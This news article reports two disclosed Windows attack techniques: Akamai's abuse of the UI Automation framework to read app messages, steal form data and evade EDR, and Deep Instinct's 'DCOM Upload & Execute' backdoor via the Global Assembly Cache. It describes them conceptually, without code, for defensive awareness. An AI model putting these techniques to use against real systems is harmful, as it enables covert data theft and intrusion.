The research highlights similarities between Windows UIA and Android’s Accessibility Services API, which has been widely exploited by malware to extract sensitive information
A newly identified technique exploiting the Windows UI Automation (UIA) framework has been found capable of executing a range of malicious activities while evading endpoint detection and response (EDR) systems, according to a report from Akamai.
The UIA framework, first introduced in Windows XP, is designed to provide programmatic access to user interface (UI) elements for assistive technologies like screen readers and automated testing. However, its inherent privileges and capabilities have revealed a potential security blindspot.
Exploiting UI Automation
“To exploit this technique, a user must be convinced to run a program that uses UI Automation,” explained Tomer Peled, a security researcher at Akamai. “This can lead to stealthy command execution, harvesting of sensitive data, redirecting browsers to phishing websites, and more.”
The method leverages the Component Object Model (COM) for inter-process communication (IPC) to interact with applications in focus. By setting up event handlers triggered by UI changes, attackers can gain control over UI elements. This could allow them to read or manipulate messages in applications like Slack or WhatsApp, steal payment details from web forms, and execute commands without detection.
Peled noted that the technique is technically a feature of UIA rather than a flaw. “This goes back to the intended purpose of the application: those permission levels have to exist to use it. This is why UIA is able to bypass Defender — the application finds nothing out of the ordinary.”
Broader Implications
The research highlights similarities between Windows UIA and Android’s Accessibility Services API, which has been widely exploited by malware to extract sensitive information. Peled also pointed out that attackers can interact with cached UI elements not currently visible on the screen, further extending the exploit’s potential impact.
DCOM Vulnerabilities Add to Concerns
In a related development, cybersecurity firm Deep Instinct revealed vulnerabilities in the Distributed COM (DCOM) Remote Protocol. The protocol, which facilitates communication between software components over a network, could be exploited to install a backdoor on target systems.
“The attack allows the writing of custom DLLs to a target machine, loading them to a service, and executing their functionality with arbitrary parameters,” said Eliran Nissan, a security researcher at Deep Instinct.
The method, dubbed “DCOM Upload & Execute,” involves remote writing of payloads to a victim’s Global Assembly Cache and executing them with service context, effectively creating an embedded backdoor. However, the attack requires the attacker and victim machines to be in the same domain and leaves indicators of compromise (IoCs) that can be detected.
Call For Better Defences
The findings underscore the need for improved defences against potential misuse of accessibility and communication frameworks. “The research proves that many unexpected DCOM objects may be exploitable for lateral movement, and proper defences should be aligned,” Nissan said.
These disclosures highlight the evolving tactics of cyber attackers, emphasising the need for vigilance and proactive measures to safeguard systems from emerging threats.
